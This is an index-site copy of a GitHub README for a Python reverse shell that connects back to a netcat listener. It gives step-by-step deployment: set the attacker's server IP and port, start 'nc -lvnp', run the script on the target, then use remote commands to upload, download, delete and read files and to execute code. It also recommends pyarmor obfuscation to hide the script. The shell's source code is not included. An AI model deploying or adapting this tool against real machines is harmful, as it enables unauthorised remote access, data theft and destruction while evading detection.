An open API service indexing awesome lists of open source software.

https://github.com/anonymousx46/reverse-shell

Python Reverse Shell with Netcat
https://github.com/anonymousx46/reverse-shell

netcat obfuscator python reverse-shell

Last synced: 6 months ago
JSON representation

Python Reverse Shell with Netcat

Awesome Lists containing this project

README

          

# Created By ANONYMOUSx46

## Python Coded Revese Shell:

![Kali Linux](https://img.shields.io/badge/Kali%20Linux-Penetration%20Testing-blue?style=flat&logo=kali-linux)
![Netcat](https://img.shields.io/badge/Netcat-Network%20Utility-green?style=flat&logo=linux)
![Python](https://img.shields.io/badge/Python-3.x-yellow?style=flat&logo=python)

A Python-based reverse shell script that works seamlessly with the Kali Linux tool **netcat**. This script allows you to establish a remote connection to a machine, execute commands, and transfer files. The code can also be run through an obfuscator tool for added security.

## Prerequisites

- Python 3.x
- Kali Linux with netcat installed
- Obfuscator tool (optional)

## Installation

1. **Clone the repository:**

```bash
git clone https://github.com/yourusername/Reverse-shell.git
cd Reverse-shell
```

2. **Configure the server address and port:**

Edit the Python script to set your server's IP address and port:

```python
server_address = 'YOUR_SERVER_IP'
server_port = YOUR_SERVER_PORT
```

3. **Run the script:**

```bash
python3 Rev3.py
```

## Usage

1. **Set up the listener on your Kali Linux machine:**

```bash
nc -lvnp
```

Replace `` with the port number you configured in the Python script.

2. **Run the reverse shell script on the target machine:**

```bash
python3 Rev3.py
```

3. **Available Commands:**

- `quit`: Exit the reverse shell.
- `clear`: Clear the terminal screen.
- `cd `: Change the current directory.
- `set =`: Set an environment variable.
- `upload `: Upload a file to the target machine.
- `download `: Download a file from the target machine.
- `rm `: Remove a file from the target machine.
- `mkdir `: Create a directory on the target machine.
- `cat `: Read a file's contents.
- `python `: Execute a Python script.

## Obfuscation (Optional)

For added security, you can run the script through an obfuscator tool. One popular option is [pyarmor](https://pypi.org/project/pyarmor/).

1. **Install pyarmor:**

```bash
pip install pyarmor
```

2. **Obfuscate the script:**

```bash
pyarmor pack -x " --exclude obf " reverse_shell.py
```

## Disclaimer

This project is intended for educational purposes only. The author is not responsible for any misuse of this tool.